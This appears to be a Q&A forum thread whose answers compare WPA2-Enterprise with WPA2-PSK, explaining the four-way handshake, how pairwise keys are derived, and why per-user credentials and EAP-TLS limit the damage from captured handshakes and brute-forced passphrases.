Does using WPA2-Enterprise just change the attack model vs WPA2-PSK?

WPA2-Enterprise is (in my opinion) considerably more secure than PSK. Reasons

  • WPA2-PSK has a single shared key amongst all devices. that means that if one of the devices is compromised the key is lost, so the more devices you have the risk of loss or compromise increases. As against this WPA2-Enterprise has per user secrets, so not the same problem.
  • Using WPA2-Enterprise each user can change their credentials as required, whereas with WPA2-PSK changing the secret could be a major undertaking, depending on the size and make-up of the user/device population. This increases the potential severity of a compromise as key rotation will be much slower (in most cases) than password rotation so if a credential is compromised, it's likely to remain so for longer with PSK.
  • With WPA2-Enterprise you can make use of stronger authentication mechanisms (e.g. 2-factor if needed)
  • With WPA2-Enterprise you can add certificate authentication to stop random attackers brute-forcing the users creds to get access.

To answer your question, you really need to understand a little bit about how WPA2 works.

To start with, both sides need a common starting point (the "Pairwise Master Key" or PMK) on which to build the encryption key ("Pairwise Transient Key" or PTK). This PMK is either the PSK for WPA2-PSK or it is generated by the RADIUS server during the EAP exchange for WPA2-Enterprise.

The PTK is created by combining and hashing the following values: the PMK, the authenticator nonce value or ANonce, the supplicant nonce value or SNonce, the MAC address of the AP (BSSID), and finally the MAC address of the station.

The information for the PTK is exchanged in a four way handshake:

  1. After the station authenticates, the AP will send the ANonce to the station.
  2. The station responds with the SNonce plus a MIC (message integrity code).
  3. The AP then responds to the station with the GTK (group temporal key - used for broadcast/multicast) and a MIC.
  4. The station sends an acknowledgement to the AP.

Once this is done, both the station and the AP have been able to generate the PTK and know that the other side has been able to do so as well.

What makes WPA2-Enterprise so much more secure than WPA2-PSK, is that each and every authenticated station will have a unique PMK, and the PMK will be unique every time the station connects. So even if someone were to brute force the PTK and calculate the PMK, this would only apply to the single station and only until it reconnects.

With WPA2-PSK, once the attacker has calculated the PMK (in this case the PSK), as long as it can capture the four way handshakes between the station(s) and AP, it can decrypt all the data on the wireless network. This is often done by spoofing a deauthentication frame to the stations causing them to reconnect.


In Personal Mode or Pre-shared Key (PSK), all users share the same secret key which is 256-bits, generated from a pass-phrase of 8 to 64 characters. WPA2 uses strong encryption protocols which may be potentially uncrackable when a sufficiently long and securely generated pass-phrase is used. Otherwise, the shared secret can be found by capturing the four way handshake and computing all possible combinations. If the brute force/dictionary attack is successful (probably due to a weak key that can be found in rainbow tables) then all the future/past communications may be compromised. Another drawback is that all users may need to change the secret key if an employee who knows the secret key leaves the organization.

In Enterprise Mode or RADIUS Mode, an external RADIUS or AAA server is used for authentication. Each user may be issued with unique login credentials (including certificate). Therefore even if you were to brute force and somehow obtain the password of a user, only that user is affected. This unique username and password scheme is also scalable as user accounts can be easily added or removed from the network.

The Enterprise mode is based on the IEEE 802.1X authentication standard and uses the Extensible Authentication Protocol (EAP) with many variants. If EAP-TLS and certificates is used (generally regarded as the most secure but troublesome to deploy) then the brute forcing method will be even harder since you now need to break asymmetric schemes like RSA (based on the assumption that integer factorization is a hard problem - which survived over 20 years of scrutiny) instead of simply brute forcing a potentially "weaker" pass-phase. With a client-side certificate, a compromised password alone is not enough to break the EAP scheme because the client's private key is also needed.

Therefore, WPA2 Enterprise is clearly more secure and scalable than the PSK version.